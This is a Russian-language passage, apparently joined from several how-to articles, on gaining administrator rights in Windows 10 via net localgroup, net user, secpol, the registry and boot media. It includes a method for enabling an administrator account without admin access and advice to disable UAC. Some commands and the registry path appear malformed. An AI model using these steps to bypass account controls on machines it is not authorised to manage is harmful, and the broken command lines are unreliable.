5. Запоминаем имя профиля, которого нужно назначить администратором.
6. Далее вводим команду net localgroup Администраторы имяпользователя /add 
7. Нажимаем «Enter».
8. После этого вводим net localgroup Пользователи имяпользователя /delete 
9. Опять нажимаем «Enter».

Осуществив эти действия, пользователь добавится в раздел администраторов и удалится из списка простых.

Примечание: в англоязычных версиях ОС нужно использовать английские названия — Administrators/Users. Если логин состоит из двух или более слов, то его нужно взять в кавычки.

Запуск программ с администраторскими полномочиями

Некоторые программы некорректно работают или даже совсем не запускаются, если включать их без привилегий администратора. Запустить приложение соответствующим образом можно несколькими способами. Рассмотрим разные варианты в деталях.  

Поисковые результаты

Самым простым вариантом запуска программы от имени администратора — это найти её по имени и выбрать соответствующий вариант из контекстного меню.

Запуск программы из стартового меню

Почти таким же образом запустить приложение с правами администратора в Windows 10 можно из стартового меню системы. Единственное отличие в данном случае — потребуется воспользоваться пунктом «Дополнительно», который содержит в себе нужный нам вариант.

Использование ярлыка приложения

Более продвинутый тип запуска программы с админ правами в Windows 10 имеется в случае её открытия при помощи ярлыка. Тут мы можем просто воспользоваться соответствующим пунктом из контекстного меню

или перейти в «Свойства», где, нажав на кнопку «Дополнительно»,

можно будет всегда запускать программу с повышенными привилегиями, установив галочку в соответствующем пункте. 

Использование Windows PowerShell

Еще одним способом запуска приложения с привилегиями администратора является использование Windows PowerShell.

1. Нажмем на кнопку «Пуск» правой кнопкой мыши.
2. Выбираем пункт для запуска Windows PowerShell с административным доступом.

Теперь включив любую программу из консоли, она будет запущена от имени администратора. Вот такими способами можно дать административный доступ обычному пользователю и запускать приложения с повышенными привилегиями. 

Напоследок стоит отметить, что получить права администратора или запустить программу от его имени, не обладая доступом к учетке с повышенными привилегиями, невозможно по соображениям безопасности. Только администратор может давать другим пользователям такой уровень доступа. 

Post Views: 3 777

Вы, должно быть, заметили, что на вашем компьютере часто устанавливается много программ, для запуска которых требуются права администратора. Наличие прав администратора позволяет вносить изменения в систему, которые могут повлиять на всех других пользователей. Другими словами, любая программа, которую вы решили запустить от имени администратора, предоставляет ей больший доступ к компьютеру при запуске.

Контроль учетных записей уведомляет вас перед внесением изменений – не всех изменений, а только тех, которые требуют уровня администратора или повышенных разрешений. Всякий раз, когда вы запускаете некоторые программы, вы можете сначала увидеть подсказку UAC. Программа запустится только после вашего согласия. Это функция безопасности в Windows. Ключ заключается в понимании того, что можно сделать и как можно добиться изменения прав администратора или повышения привилегий без ущерба для безопасности.

Давайте рассмотрим различные варианты и сценарии.

Откройте окно командной строки с повышенными правами

Хотя вы можете выполнять много задач с использованием CMD, для некоторых задач требовались повышенные привилегии. Windows 8.1 позволяет легко открывать Командную строку (Admin) с помощью меню WinX. Этот пост показывает, как вы можете запустить командную строку от имени администратора.

Читать . Как создать ярлык с повышенными привилегиями для запуска Программы.

Сделать программу всегда Запускать от имени администратора

Если вы хотите, чтобы программа всегда выполнялась с правами администратора, щелкните правой кнопкой мыши исполняемый файл программы и выберите Свойства. Здесь выберите «Запустить эту программу от имени администратора». Нажмите Применить> ОК. Этот пост подробно покажет вам, как сделать так, чтобы приложения всегда запускались от имени администратора.

Отключите режим одобрения администратором с помощью Secpol

Запустите secpol.msc , чтобы открыть локальную политику безопасности и перейти к «Локальные политики»> «Параметры безопасности». На правой панели вы увидите параметр Контроль учетных записей: включить режим одобрения администратором . Дважды щелкните по нему и выберите Отключено .

Этот параметр политики управляет поведением всех параметров политики контроля учетных записей (UAC) для компьютера. Если вы измените этот параметр политики, вы должны перезагрузить компьютер. Доступны следующие варианты: (1) Включено . (По умолчанию) Режим одобрения администратором включен. Эта политика должна быть включена, и соответствующие параметры политики UAC также должны быть установлены соответствующим образом, чтобы позволить встроенной учетной записи администратора и всем другим пользователям, являющимся членами группы администраторов, работать в режиме одобрения администратором. (2) Отключено . Режим одобрения администратором и все параметры политики UAC отключены. Если этот параметр политики отключен, Центр безопасности уведомляет вас о снижении общей безопасности операционной системы.

Имейте в виду, это снизит общую безопасность вашего компьютера!

Предоставление повышенных привилегий в Windows 10/8/7

Стандартный пользователь не имеет каких-либо специальных разрешений для внесения изменений в администрирование сервера. Он может не иметь следующих привилегий: добавление, удаление, изменение пользователя, выключение сервера, создание и администрирование объекта групповой политики, изменение прав доступа к файлам и т. Д.

Но пользователь с правами администратора может сделать гораздо больше, чем обычный пользователь. Права, однако, предоставляются после того, как ему предоставлены повышенные привилегии для каждого уровня в одной из групп, а именно: Локальный сервер, Домен и Лес.

Когда пользователь добавляется в одну из групп, он получает больше возможностей, чем обычный пользователь. Они получают дополнительные права пользователя. Это права или конфигурации, которые управляют «кто» может делать «что» с компьютером. При настройке каждый компьютер может поддерживать уникальный набор администраторов, контролирующих различные области этого компьютера.

Существует более 35 прав пользователя на компьютер. Некоторые из наиболее распространенных прав пользователя, которые управляют повышенными привилегиями на компьютере, перечислены ниже:

• Выключить систему
• Принудительное отключение удаленной системы
• Войти как пакетное задание
• Войти как сервис
• Резервное копирование и восстановление файлов и каталогов
• Включить доверенный для делегирования
• Генерация аудита безопасности
• Загрузка и выгрузка драйверов устройств
• Управление аудитом и журналом безопасности
• Взять на себя ответственность за файлы и другие объекты

Права пользователя развертываются с помощью групповой политики (локальный/Active Directory). Это прокладывает путь для последовательного контроля доступа к серверам.

Кроме того, каждый файл, папка и раздел реестра имеют список контроля доступа (ACL). Список предоставляет стандартные разрешения, такие как

1. Полный контроль
2. изменять
3. Читать

Эти стандартные разрешения позволяют упростить настройку объектов.Короче говоря, ACL – это своего рода список пользователей, групп и/или компьютеров, которым предоставлены разрешения для объекта, связанного с ACL. Вы можете прочитать полную информацию об этом, делегировании Active Directory, делегировании групповой политики и многом другом, в этом отличном посте на WindowsSecurity.com. В нем обсуждается, как предоставить повышенные привилегии для Active Directory и сервера.

Эти инструкции также могут вас заинтересовать.

1. Взять на себя ответственность и полный контроль над ключами реестра
2. Полное владение файлами и папками.

На чтение 5 мин Просмотров 29.7к.

В операционной системе Windows для упрощения работы и разделения пользователей по статусу используется система учётных записей. Ключевой учётной записью можно считать аккаунт администратора, ведь именно он дает максимально широкие возможности для работы с ПК. Давайте узнаем, как активировать эту учётную запись и получить права администратора в Windows 10.

Содержание

1. Дать права администратора через  «Параметры»
2. Как получить права администратора при помощи “Панели управления” Видеоинструкция
3. Как получить права администратора, используя утилиту “Локальных пользователей”
4. Как получить права администратора в Windows 10 посредством CMD
5. Видеоинструкция
6. Доступ к учётным записям с соответствующими правами отсутствует
7. Как включить права администратора в “Групповой политике”
8. Как сделать себя администратором в windows 10, используя  “Редактор реестра”

Дать права администратора через  «Параметры»

Для использования данного метода придётся перейти в раздел параметров, для этого:

1. На клавиатуре зажмите Win + I
2. В появившемся окне нужно запустить раздел учётных записей.
   
3. Оттуда переходим во вкладку семья и другие люди.
4. Далее, нужно выбрать клавишу с надписью изменения типа вашего аккаунта и выбрать из выпадающего списка строчку администратора.
   
5. Перезапустите компьютер, и уже следующая сессия начнётся с аккаунтом администратора. Теперь вы знаете, как стать администратором Windows 10. Но это не единственный способ.

Как получить права администратора при помощи “Панели управления” Видеоинструкция

Есть и альтернативный способ получения учётной записи администратора. Для этого нам придётся использовать панель управления Windows.

1. Откройте поиск и введите “Панель управления”
   
2. Откройте учётные записи
   
3. Выберите ту учётную запись, которую используете по умолчанию
4. Здесь нажмите на строчку изменения учётной записи.
   
5. Включите права администратора
   
6. Перезагрузите ПК, и при следующей загрузке ваша учётная запись получит расширенные права администратора.

Как получить права администратора, используя утилиту “Локальных пользователей”

Получить права администратора в Windows 10 можно и посредством отдельной утилиты

1. Зажмите две кнопки Win + X и выберите “Управление компьютером”
   
2. Выберите учётную запись администратора, нажимаем ПКМ и нажмите на свойства
   
3. Здесь уберите галочку отключения учётной записи.
   

Как получить права администратора в Windows 10 посредством CMD

1. Зажмите кнопку Win + R и введите “cmd”
   
2. Введите команду: net user administrator/active: yes
   

Пользователь может столкнуться с проблемой. Если на экране появляется уведомление о том, что учётная запись с указанным именем не обнаружена, значит при установке системы кто-то задал другое имя. Используйте команду net user, чтобы получить доступ ко всему перечню учётных записей.

Предположим, что учётная запись с правами администратора называется abc. В этом случае применяем уже использованную ранее команду, но теперь меняем имя. Выглядит это следующим образом:
net user abc/active:yes

Готово. По умолчанию аккаунт будет без пароля. Дальше вы узнаете, как сделать пользователя администратором в Windows 10 другими методами.

Видеоинструкция

Доступ к учётным записям с соответствующими правами отсутствует

Если доступа к учётной записи администратора нет, то проблем будет больше. Но и с ними можно справиться. Вам потребуется загрузочный носитель с любой родственной версией операционной системы Windows 10.

1. Вставьте загрузочную флешку
2. Перезагрузите ПК.
3. Нажмите на командную строку. Или использовать другой способ, сразу со стартового экрана.
   
4. Зажмите две клавиши Shift + F10.
5. Дальше используйте ту же команду с приставкой net user название вашей учетной записи /active:yes
   
   По умолчанию, консоль в этом режиме будет открыта с уже готовыми правами администратора, осталось только активировать учётную запись способом, описанным выше.

Как включить права администратора в “Групповой политике”

Если вы продвинутый пользователь Windows 10, но не знаете, как получить права администратора, можно воспользоваться и этим методом.

1. Нажмите клавиши Win + R и введите secpol.msc
   
2. Откройте «Параметры безопасности»
   
3. Здесь два раза нажмите на «Состояние учётной записи»
   
4. Выберите «Включить»
   

Изменения будут сохранены, закрываем все предыдущие настройки.

Как сделать себя администратором в windows 10, используя  “Редактор реестра”

1. Нажмите две клавиши Win + R и введите regedit
   
2. Здесь нужно перейти на вкладку Local Machine.
3. Отсюда переходим по следующему маршруту: КомпьютерHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem (можете скопировать отсюда и вставить у себя)
   
4. Открывается соответствующее окно. Здесь нужно поменять несколько параметров, сделав всё так, как на картинке.
   
5. Кликните два раза ЛКМ по нужному имени и в “Значении” укажите нужную цифру, которая стоит на конце красных цифр предыдущего скрина
6. 

Готово, подтверждаем свой выбор и перезапускаем ПК. Теперь у вас появился аккаунт администратор Windows 10.

Если у вас еще остались вопросы, то вы можете задать их в комментариях, и я постараюсь помочь вам их решить.

Скворцов Михаил

Специалист программирования компьютерных систем и устройств на базе ОС «Android»

Задать вопрос эксперту

( 1 оценка, среднее 5 из 5 )